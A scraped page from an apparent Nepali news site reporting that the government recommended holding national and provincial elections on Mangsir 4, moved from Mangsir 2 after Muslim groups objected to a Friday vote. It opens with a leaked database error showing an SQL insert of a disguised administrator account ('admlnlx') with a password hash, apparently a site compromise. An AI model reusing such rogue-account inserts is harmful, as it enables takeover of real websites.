WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B5paTOEKCbyZVKzQIfGq2l3nr33HBJ0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 01:43:51', '', 'admlnlx', 'admlnlx')
काठमाण्डौ । मंसिर ४ गते सरकारले चुनाव गर्ने भएको छ । निर्वाचन आयोगले मंसिर २ मा गर्न सुझाव दिएपनि सरकारले ४ मंसिरमा गर्ने गरी मन्त्रिपरिषदबाट सिफारिश गरेको छ ।
मुसलमान समुदायले आफूहरुको नमाज पढ्ने दिन भएकाले मंसिर २ शुक्रबार चुनाव नगरि सार्न आग्रह गरेपछि सरकारले आइतबार पार्ने भएको हो ।
प्रतिनिधि सभा र प्रदेशको चुनाव ४ मंसिरको आइतबार एकै चरणमा हुने गरी राष्ट्रपति विद्यादेवी भण्डारीसमक्ष सिफारिश हुने भएको छ ।